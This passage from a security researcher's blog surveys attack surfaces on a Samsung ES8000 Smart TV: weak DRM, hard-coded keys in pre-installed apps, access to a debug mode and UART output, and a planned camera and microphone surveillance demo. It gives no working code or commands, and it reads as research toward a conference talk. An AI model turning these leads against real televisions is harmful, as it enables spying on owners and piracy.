DRM attacks may be boring for hackers, but they’re critical to TV vendors. As far as I know, if your TV platform is weak against DRM attacks, the multimedia providers won’t give you the content. And of course the content business is really important in the field, so vendors like Samsung are trying to make it secure. Unfortunately, there are already media programs, but I hardly see them as secure. Typical packet sniffing works.

Last, there are minor issues in pre-installed applications. For example, there is a Facebook app, but it has a hard-coded secret key. I don’t know how important this key is; however, there are many insecure storage cases. For example, there are many private keys that look like they were created by Samsung.

The TV uses ARMv7, so we’re doing ARM reversing. While reversing, we’ve pointed out some spots that might cause open source license issues. It’s known that there are law firms, especially in the US, that are ready to sue vendors who use open source improperly, so we want to be careful; I’ll explain this topic after talking to Samsung.

I’ve quickly mentioned the attack surfaces so far. So, what’s the worst case if your Smart TV gets hacked? It’s probably when your TV does surveillance! The ES8000 has a lot of hardware modules. There are WiFi/Bluetooth/UART/JTAG/etc. and a camera/mic!

Doesn’t camera/mic sound scary? We’re working on a demo in which our malicious program records your motion/voice. Of course it sounds very scary, but it would be a good demo of how secure a Smart TV should be. Side note: I hardly put on clothes at home.

Besides the software stuff, there is some interesting hardware-like work. As I said, we found a way to enable the debug mode on the TV, and we just put a cable into EX-LINK; now we can see the UART messages without opening the TV case.

So, I think we’ve done 50% of this research so far. We hope this work will be done in January. Then we’ll submit a talk to security conferences. Some good friends of mine have commented nicely on our work: Mongii of Hackerschool, Tora of Google and Donato of Revuln. Thanks to the guys, and I hope I’m going to get this research done soon.

Also, I’ll put slides about Smart TV attack surfaces here. They were presented at small, local seminars. The seminars were for introducing the attack surfaces, not detailed technical stuff. So, feel free to enjoy, and please give us good ideas if you have any. :) I need to stop writing before I’m too drunk!

Slides: samsung_smart_tv_attack_surfaces